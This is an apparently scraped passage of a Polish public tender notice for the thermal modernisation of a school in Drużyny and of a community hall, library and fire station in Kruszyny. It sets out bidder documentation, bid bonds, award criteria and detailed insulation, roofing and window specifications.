Zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne lub inny dokument potwierdzający, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz                               z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;  
/Wymagana forma dokumentu  oryginał lub kopia poświadczona za zgodność z  
oryginałem przez Wykonawcę/
7.2.4.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt od 7.2.3.1 do 7.2.3.3 - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a)	nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, 
b)	nie otwarto jego likwidacji ani nie ogłoszono upadłości. 

7.2.5.	Dokumenty, o których mowa w pkt 7.2.4 lit. a powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Dokumenty, o których mowa                  w pkt 7.2.4 lit. b powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
7.2.6.	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów,                             o których mowa w pkt 7.2.4., zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania tej osoby. Przepis pkt 7.2.5. stosuje się odpowiednio. 
7.2.7.	W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu. 
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, stanowiący oświadczenie zgodne z treścią Załącznika Nr 5 do SIWZ  Doświadczenie Wykonawcy; 
/Wymagana forma dokumentu  oryginał/ 
Do wykazu należy dołączyć dowody określające czy te roboty budowlane zostały wykonane należycie, w szczególności informacje o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty; 
/Wymagana forma dokumentów  oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę/ 
Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych i uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, stanowiący oświadczenie zgodne z treścią Załącznika Nr 6 do SIWZ  Potencjał Kadrowy; 
/Wymagana forma dokumentu  oryginał/<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">nie dotyczy</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. W terminie 3 dni od zamieszczenia na stronie internetowej Zamawiającego informacji z otwarcia
ofert, o której mowa w art. 86 ust. 5 ustawy Pzp, Wykonawca zobowiązany jest przekazać
Zamawiającemu oświadczenie Wykonawcy o przynależności albo braku przynależności do tej
samej grupy kapitałowej, zgodne z treścią Załącznika Nr 7 do SIWZ. 2. Wykonawca, który polega
na zdolnościach lub sytuacji innych podmiotów musi udowodnić Zamawiającemu, że realizując
zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności
przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów
na potrzeby realizacji zmówienia - zobowiązanie powinno być podpisane przez osoby upoważnione
do reprezentowania tych podmiotów i należy je złożyć wraz z ofertą. 3. Dowód wniesienia wadium
należy dołączyć do oferty zgodnie z postanowieniami pkt 14.5.2. Specyfikacji. 4. Wypełniony
Formularz OFERTA zgodny z treścią wzoru zamieszczonego w Specyfikacji  Załącznik Nr 1 do
SIWZ wraz z kosztorysem ofertowym. 5.Pełnomocnictwo do reprezentowania Wykonawcy w
postępowaniu albo do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy, jeżeli
osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana
jako upoważniona do jego reprezentacji we właściwym rejestrze lub innym dokumencie. W
przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia pełnomocnictwo do
reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia albo do
reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia i zawarcia
umowy.
Uwaga: W przypadku ustanowienia Pełnomocnika spoza grona Wykonawców wspólnie ubiegających się o udzielenie zamówienia, pełnomocnictwo musi być podpisane przez wszystkich Wykonawców. Podpisy muszą być złożone przez osoby upoważnione do składania oświadczeń woli w imieniu Wykonawców. </div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Wykonawca jest zobowiązany do wniesienia wadium: 
Zadanie 1. Termomodernizację Szkoły Podstawowej w Drużynach  wadium w wysokości 6 000,00 zł (słownie złotych: sześć tysięcy 00/100);
Zadanie 2. Termomodernizację budynku świetlicy wiejskiej, biblioteki oraz remizy OSP w miejscowości Kruszyny - wadium w wysokości 4 000,00 zł (słownie złotych: cztery tysięcy 00/100);
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px">Umowa zostanie zawarta z wybranym Wykonawcą na warunkach określonych we Wzorze Umowy stanowiącym Załącznik Nr 2 do Specyfikacji.</div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px">Wykonawca przed podpisaniem umowy będzie zobowiązany do wniesienia zabezpieczenia należytego wykonania umowy, stanowiącego 10 % ceny całkowitej (ceny oferty łącznie z VAT)podanej w ofercie.</div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px">1.Zabezpieczenie należytego wykonania umowy może być wnoszone według wyboru Wykonawcy w jednej lub w kilku następujących formach:  pieniądzu, przelewem na rachunek bankowy Zamawiającego: Bank Spółdzielczy w Brodnicy. Nr rachunku 22 9484 1150 1400 0101 2014 0030 
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym
że poręczenie kasy jest zawsze poręczeniem pieniężnym,  gwarancjach bankowych, 
gwarancjach ubezpieczeniowych,  poręczeniach udzielanych przez podmioty, o których mowa w
art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju
Przedsiębiorczości.</div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zakres, charakter zmian oraz warunki wprowadzenia zmian zawiera szczegółowo "Wzór Umowy" stanowiący załącznik nr 2 do Specyfikacji<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 06/03/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Termomodernizację Szkoły Podstawowej w Drużynach <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie 1.
Termomodernizację Szkoły Podstawowej w Drużynach:
Opracowanie  obejmuje  wykonanie  elewacji,  docieplenie  stropodachu, wykonanie  pokrycia  dachu  wraz  z  obróbkami  dekarskimi  i  orynnowaniem, wymianę częściowo stolarki okiennej i drzwiowej.
Docieplenie ścian zewnętrznych budynku    płyty styropianowe  EPS 80 FASADA gr.  14  cm  mocowane  do  ściany  zewnętrznej  metodą  lekką  z  kołkowaniem. Styropian o  współczynniku  przewodzenia  ciepła    =  0,04  W/m2K.  Natomiast docieplenie ściany zewnętrznej z izolacją grubości 10 cm dodatkowo ocieplić  styropianem EPS 80 FASADA o grubości 5 cm z kołkowaniem.
Izolacja stropodachu  zerwanie istniejących warstw papy w zależności od stanu technicznego  po  odkrywkach,  następnie  należy  ułożyć  warstwę  wełny  mineralnej twardej  o  grubości  15  cm  a  następnie  papę  termozgrzewalną  nawierzchniową grubości 5.2 mm na  SBS na papie podkładowej grubości 3.0 mm.  Zaprojektowano ułożenie wełny mineralnej dwuwarstwowo o grubości dolnej warstwy 10  cm i górnej warstwy 5 cm. - o gęstości płyt co najmniej 170 kg/m3
Kominy      z  uwagi  na  niedostateczny  stan  techniczny  należy  przemurować istniejące ponad dachem kominy z cegły ceramicznej klinkierowej pełnej na zaprawie cementowo-wapiennej  M.5.  Kominy  należy  ponadto  nadmurować,  wykonać  czapę betonową,  osadzić  w  bocznych  ściankach  pionowych  kratki  wentylacyjne  stalowe. Czapy kominowe zakończyć papą termozgrzewalną nawierzchniową.
Mury zewnętrzne  z uwagi na widoczne rozwarstwienia i ubytki fragmentów murów zaprojektowano przemurowanie ścian w miejscach rozwarstwień z cegły ceramicznej pełnej  na  zaprawie  cementowo-wapiennej  M.5  a  także  uzupełnienie  w  miejscach ubytków. 
Ogniomury    zaprojektowano  nadbudowę  istniejących  ogniomurów  cegłą ceramiczną pełna na zaprawie cementowo-wapiennej M.5. o wysokości około 20 cm i szerokości 25  cm.  Nadbudowane  fragmenty  murów  należy  otynkować  zaprawą cementową  oraz  zamknąć  obróbką  dakarską.  Obróbka  dekarska  powinna  być wykonana ze spadkiem do wewnątrz. Połączenie ogniomuru i pokrycia stropodachu należy wykonać wywinięciem papy  termozgrzewalnej  o  wysokości  około  20  cm  z listwą zamykającą stalową z płaskownika .
Roboty wykończeniowe
Obróbki  dekarskie    wymiana  wszystkich  elementów  (rynny  i  rury  spustowe, parapety  zewnętrzne, itp.). Zaprojektowano wymianę parapetów zewnętrznych, obróbek i  orynnowania  na  elementy  z  blachy  ocynkowanej  powlekanej  w  kolorze wskazanym przez Zamawiającego.
Elewacja  budynku  wykonanie wyprawy cienkowarstwowej z akrylowych tynków dekoracyjnych  barwionych  w  masie  o  fakturze  nakrapianej  wg barwy i wzoru wskazanego  przez  zamawiającego.  Należy przyjąć wykonanie elewacji w kilku kolorach  o  intensywności  barwy co najmniej III kat. Załączone przykładowe kolorystyki mogą służyć jedynie poglądowo.
Stolarka okienna PCV  zespolona o wymiarach znormalizowanych. Szklenie okien zewnętrznych  2-krotnie,  K  max=2,0  W/m2K.  Izolacyjność termiczna elementu okna współczynnik U   1.70 W/m2K (z uwzględnieniem zestawów szklanych, profili oraz zaburzeń  brzegowych).  Izolacyjność  termiczna  części  nieprzeźroczystej  U0,25 W/m2K.  Izolacyjność akustyczna okien RA2   32 dB  . Podziały stolarki zgodnie ze wzorem  istniejącym.  Skrzydła okienne rozwieralno-uchylne. Do wymiany zaprojektowano pozostałe okna drewniane. 
Stolarka drzwiowa zewnętrzna  zaprojektowano stolarkę z profili aluminiowych z podziałem  i  przeszkleniem  wyposażoną  w  zamki  na  klucz  patentowy  oraz samozamykacze, kolor biały lub brąz RAL 8011. Szerokość skrzydła części nieryglowanej min. 90 cm w świetle. Drzwi zewnętrzne zaprojektowano z profili z przegrodą termiczną o bardzo dobrej izolacyjności cieplnej. Podstawowe parametry stolarki:
- zastosowanie jako wypełnienia szkła zespolonego o współczynniku U=1.0 W/m2K. 
- profile trzykomorowe o grubości 60 [mm] z wewnętrzną komorą izolacyjną (z przekładek termicznych z poliamidu) które powinny zapobiec przedostawaniu się ciepła na zewnątrz i znacznie ograniczyć zjawisko kondensacji pary wodnej po wewnętrznej stronie drzwi. 
- zastosować zabezpieczenia w postaci zamka z trzypunktową zasuwnicą siekierową klasy C, bolce antywyważeniowe. 
- drzwi w 2 klasie odporności na włamanie. 
- wysoka odporność na wilgoć i działanie promieni UV, 
- podwyższona wytrzymałość na zarysowania 
- zawiasy z trzystopniową regulacją: boczną, wysokości i siły docisku 
Do wymiany zaprojektowano drzwi wejściowe tylne (2 szt).
3.3.	Przedmiot zamówienia obejmuje również organizację placu budowy, zabezpieczenie terenu budowy, wykonanie niezbędnych badań i prób, uporządkowanie terenu po zakończeniu robót oraz wykonanie innych robót wymaganych technologią. 
3.4.	Szczegółowy opis przedmiotu zamówienia oraz warunki jego realizacji zawiera:  
	dokumentacja projektowa obejmująca projekty budowlano-wykonawcze, 
	szczegółowe specyfikacje techniczne, 
	wzór umowy, 
	przedmiary robót, kosztorys ofertowy. 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45321000-3, 45261910-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/08/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>GWARANCJA</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Termomodernizację budynku świetlicy wiejskiej, biblioteki oraz remizy OSP                   w miejscowości Kruszyny<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie 2. 
Termomodernizację budynku świetlicy wiejskiej, biblioteki oraz remizy OSP w miejscowości Kruszyny.
Opracowanie obejmuje projekt termomodernizacji ścian zewnętrznych, części posadzek i stropodachu budynku wraz z wykonaniem elewacji oraz pokrycia dachu polegającym na ułożeniu papy termozgrzewalnej.
Docieplenie ścian zewnętrznych budynku  -  płyty styropianowe  EPS 80 FASADA gr.  12  cm  mocowane do ściany zewnętrznej metodą lekką z kołkowaniem. Styropian o  współczynniku  przewodzenia  ciepła    =  0,036  W/m2K.  (docieplenie dotyczy części budynku bez istniejącego docieplenia).
Izolacja stropodachu niewentylowanego betonowego  zerwanie istniejących warstw papy w zależności od stanu technicznego po odkrywkach, następnie należy ułożyć warstwę wełny mineralnej twardej o grubości 16 cm a następnie papę termozgrzewalną nawierzchniową grubości 5.2 mm na SBS na papie podkładowej grubości 4.0 mm. Zaprojektowano ułożenie wełny mineralnej dwuwarstwowo o grubości dolnej warstwy 10 cm i górnej warstwy 6 cm. - o gęstości płyt co najmniej 170 kg/m3 (współczynnik przewodzenia ciepła  = 0,040 W/m2K).
Kominy      z  uwagi  na  niedostateczny  stan  techniczny  należy  przemurować  istniejące ponad dachem kominy z cegły ceramicznej klinkierowej pełnej na zaprawie cementowo-wapiennej  M.5.  Kominy  należy  ponadto  nadmurować,  wykonać  czapę betonową,  osadzić  w  bocznych  ściankach  pionowych  kratki  wentylacyjne  stalowe. Czapy kominowe zakończyć papą termozgrzewalną nawierzchniową. 
Izolacja stropodachu drewnianego  zerwanie istniejących warstw papy i deskowania.                 W  zależności od stanu technicznego istniejących wiązarów kratowych deskowych należy wykonać wzmocnienie elementów konstrukcyjnych nabijając obustronnie deski, krawędziaki lub wymieniając fragmenty wiązarów (po wykonaniu odkrywek formę naprawy i wzmocnienia wskaże inspektor nadzoru).
Następnie należy ułożyć na dolnym pasie wiązarów warstwę wełny mineralnej grubości                 17 cm o współczynniku przewodzenia ciepła  = 0,043 W/m2K wraz z izolacją z folii paro przepuszczalnej. Następnie należy wykonać nowe deskowanie z izolacją papową i ołaceniem . Jako pokrycie zaprojektowano blachę trapezową T 35E dach powlekaną w kolorze istniejącego pokrycia budynku szkoły. Blachy trapezowe z blachy stalowej ocynkowanej powlekanej o grubości co najmniej 0,55 mm. wykonane zgodnie z normą                     PN-EN 14782:2008 i znakowane znakiem CE. 
Mury zewnętrzne  z uwagi na widoczne drobne rozwarstwienia i ubytki fragmentów murów zaprojektowano przemurowanie ścian w miejscach rozwarstwień z cegły ceramicznej pełnej na zaprawie cementowo-wapiennej M.5 a także uzupełnienie w miejscach ubytków. 
Ogniomury   zaprojektowano nadbudowę istniejących ogniomurów cegłą ceramiczną pełna na zaprawie cementowo-wapiennej M.5. o wysokości około 30 cm i szerokości 25 cm. Nadbudowane fragmenty murów należy otynkować zaprawą cementową oraz zamknąć obróbką dakarską. Obróbka dekarska powinna być wykonana ze spadkiem do wewnątrz. Połączenie ogniomuru i pokrycia stropodachu należy wykonać wywinięciem papy termozgrzewalnej o wysokości około 20 cm z listwą zamykającą stalową z płaskownika .
Roboty wykończeniowe
Obróbki  dekarskie    wymiana  wszystkich  elementów  (rynny  i  rury  spustowe, parapety  zewnętrzne  itp.).  Zaprojektowano  wymianę  obróbek  i  orynnowania  na elementy  z  blachy  ocynkowanej  powlekanej  w  kolorze  wskazanym  przez Zamawiającego.
Elewacja  budynku    wykonanie  wyprawy  cienkowarstwowej  z  akrylowych  tynków dekoracyjnych  barwionych  w  masie  o  fakturze  nakrapianej  (np.  kornik)  wg  barwy  i wzoru  wskazanego  przez  zamawiającego.  Barwa  tynku  kategorii  co  najmniej  III. Zamawiający wymaga malowania elewacji  w co  najmniej  3  kolorystykach. Zaprojektowano  wykonanie  otoków  wokół  otworów  okiennych  ze  styropiany  i  w kolorze  innej  barwy  niż  elewacja.  Wzór  otoków  należy  przyjąć  z  istniejącego budynku szkoły.
3.3.	Przedmiot zamówienia obejmuje również organizację placu budowy, zabezpieczenie terenu budowy, wykonanie niezbędnych badań i prób, uporządkowanie terenu po zakończeniu robót oraz wykonanie innych robót wymaganych technologią. 
3.4.	Szczegółowy opis przedmiotu zamówienia oraz warunki jego realizacji zawiera:  
	dokumentacja projektowa obejmująca projekty budowlano-wykonawcze, 
	szczegółowe specyfikacje techniczne, 
	wzór umowy, 
	przedmiary robót, kosztorys ofertowy. 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45321000-3, 45261910-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 25/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>GWARANCJA</td><td>40</td></tr></table><b>
